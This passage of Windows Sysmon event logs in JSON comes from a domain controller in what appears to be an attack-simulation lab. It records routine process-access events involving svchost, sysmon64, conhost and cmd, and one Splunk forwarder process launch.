07:55:35.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3696,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3697,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3698,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3699,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3700,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3701,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3702,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.846\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010079F0500}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.846","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010079F0500}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3703,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.957\r\nProcessGuid: {41C8662E-1FF7-5F25-0000-001032A10500}\r\nProcessId: 3672\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.957","ProcessGuid":"{41C8662E-1FF7-5F25-0000-001032A10500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
